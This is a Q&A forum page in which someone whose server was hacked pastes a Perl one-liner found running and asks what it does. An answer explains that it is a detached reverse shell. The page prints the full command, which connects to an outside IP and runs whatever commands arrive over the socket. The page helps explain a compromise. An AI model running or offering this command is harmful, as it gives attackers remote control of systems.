Menu
My server got hacked, and ps aux shows that it's running this program now:
perl -MIO -e $p=fork;exit,if($p);$c=new IO::Socket::INET (PeerAddr,"169.50.9.58:1212");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;
I don't know Perl...what is this program doing?
562
It opens a socket to that IP. Then it sets up the STDIN to read from it and the STDOUT to go to it. So it builds a direct communication channel between the process and that IP.
Then it goes into a while loop in which it runs via system whatever comes through STDIN.
It does this in a forked process, fire-and-forget (detached) style, where the parent exits right away. So this executes and exits and there is another process that talks with that IP and runs commands.
124
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With
